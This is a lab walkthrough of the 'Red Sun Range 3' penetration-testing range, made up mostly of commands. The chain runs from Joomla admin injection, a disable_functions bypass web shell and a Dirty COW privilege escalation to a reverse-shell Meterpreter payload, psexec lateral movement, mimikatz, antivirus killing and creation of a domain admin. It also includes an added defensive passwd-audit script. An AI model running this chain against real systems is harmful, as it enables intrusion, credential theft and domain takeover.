  • Red Sun Range 3 (红日靶机三)

    Information gathering

    testuser / cvcvgjASD!@

    Brute force failed

    Database login succeeded

    Joomla CMS public vulnerability

    mysql -uroot -p123 -h 192.168.1.110

    INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

    INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

    Account and password: admin2:secret

    Login successful

    disable_functions is enabled

    https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

    Upload the file

    http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

    http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

    adduser wwwuser

    passwd wwwuser_123Aqx

    Remote login

    File upload

    [wwwuser@localhost tmp]$ chmod 777 linux-exploit-suggester.sh

    [wwwuser@localhost tmp]$ ./linux-exploit-suggester.sh

    Based on the kernel version

    Download locally, then upload the file

    gcc -pthread 40839.c -o dirty -lcrypt

    [wwwuser@localhost tmp]$ chmod 777 dirty

    [wwwuser@localhost tmp]$ rm -rf passwd.bak

    [wwwuser@localhost tmp]$ ./dirty 123.com

    [wwwuser@localhost tmp]$ mv /tmp/passwd.bak /etc/passwd

    su firefart  123.com
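The privilege-escalation step above overwrites /etc/passwd and leaves a second UID-0 account behind. As an added example from the defender's side (not part of the original write-up), this script parses a constructed passwd snapshot and flags any non-root UID-0 entry, a missing root line, and accounts absent from a baseline; the account names in the sample are constructed for illustration.

```python
"""Detect the artefacts left by an /etc/passwd overwrite:
an extra UID-0 account and accounts that were not in the baseline."""

# Constructed sample data: a baseline passwd file and the same file after
# the first line has been replaced by an attacker-controlled UID-0 entry.
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
"""

CURRENT_PASSWD = """firefart:x:0:0:pwned:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
wwwuser:x:1001:1001::/home/wwwuser:/bin/bash
"""


def parse_passwd(text):
    """Return {username: uid} for every well-formed passwd line."""
    accounts = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # skip blank or malformed lines
        accounts[fields[0]] = int(fields[2])
    return accounts


def rogue_uid0(text):
    """Names of UID-0 accounts other than root; a missing root line is a finding too."""
    accounts = parse_passwd(text)
    findings = sorted(name for name, uid in accounts.items()
                      if uid == 0 and name != "root")
    if "root" not in accounts:
        findings.append("root entry missing")
    return findings


def new_accounts(baseline_text, current_text):
    """Accounts present now but absent from the baseline snapshot."""
    return sorted(set(parse_passwd(current_text)) - set(parse_passwd(baseline_text)))


if __name__ == "__main__":
    print("rogue uid 0:", rogue_uid0(CURRENT_PASSWD))
    print("new accounts:", new_accounts(BASELINE_PASSWD, CURRENT_PASSWD))
```

On a real host, feed the functions the contents of /etc/passwd and a trusted baseline copy; a stray /tmp/passwd.bak alongside a changed first line is the same indicator seen in this write-up.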

    msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.128 lport=441 -f elf > 1.elf

    msf5 > use exploit/multi/handler

    msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp

    msf5 exploit(multi/handler) > set lhost 192.168.1.128

    msf5 exploit(multi/handler) > set lport 441

    msf5 exploit(multi/handler) > run

    run autoroute -s 192.168.93.0/24

    run autoroute -p

    Host discovery

    use auxiliary/scanner/discovery/arp_sweep

    set rhosts 192.168.93.1/24

    set threads 10

    run

    msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/smb/smb_version

    msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.1/24

    msf5 auxiliary(scanner/smb/smb_version) > run

    Brute-force the password

    Log into .20

    msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec

    msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp

    payload => windows/meterpreter/bind_tcp

    msf5 exploit(windows/smb/psexec) > set rhost 192.168.93.20

    rhost => 192.168.93.20

    msf5 exploit(windows/smb/psexec) > set smbuser administrator

    smbuser => administrator

    msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD

    smbpass => 123qwe!ASD

    msf5 exploit(windows/smb/psexec) > run

    View processes

    Migrate the process

    getpid

    run post/windows/manage/migrate

    Use the sysinfo command to view the target's system information

    The route command shows the full network configuration

    run post/windows/manage/killav shuts down the system's antivirus software

    run post/windows/gather/enum_logged_on_users lists the users currently logged on to the target

    run post/windows/gather/enum_applications lists the applications installed on the system

    Use run windows/gather/credentials/windows_autologin to grab the auto-logon username and password

    load mimikatz

    kerberos

    msv

    use incognito    # help incognito shows the help

    list_tokens -u    # list the available tokens

    impersonate_token 'NT AUTHORITY\SYSTEM'    # impersonate the SYSTEM token

    or: impersonate_token NT AUTHORITY\\SYSTEM    # without single quotes the backslash must be escaped as \\

    execute -f cmd.exe -i -t    # -t runs with the impersonated token

    or just run shell

    rev2self    # revert to the original token

    Found that TEST\administrator is a domain admin account

    Add an account

    meterpreter > rev2self

    meterpreter > add_user bing 1234.com -h 192.168.93.10

    meterpreter > add_group_user "Domain Admins" bing -h 192.168.93.10

    net use \\192.168.93.10\ipc$ 1234.com /user:TEST\bing

    dir \\192.168.93.10\c$

    References

    http://yugod.xmutsec.com/index.php/2020/07/23/90.html

    https://www.cnblogs.com/Yang34/p/11407274.html

    https://www.jianshu.com/p/dc7f42ef056f

    https://xz.aliyun.com/t/2536

    https://www.jianshu.com/p/df72d1ee1e3e

  • Original source: https://www.cnblogs.com/bingtang123/p/13548976.html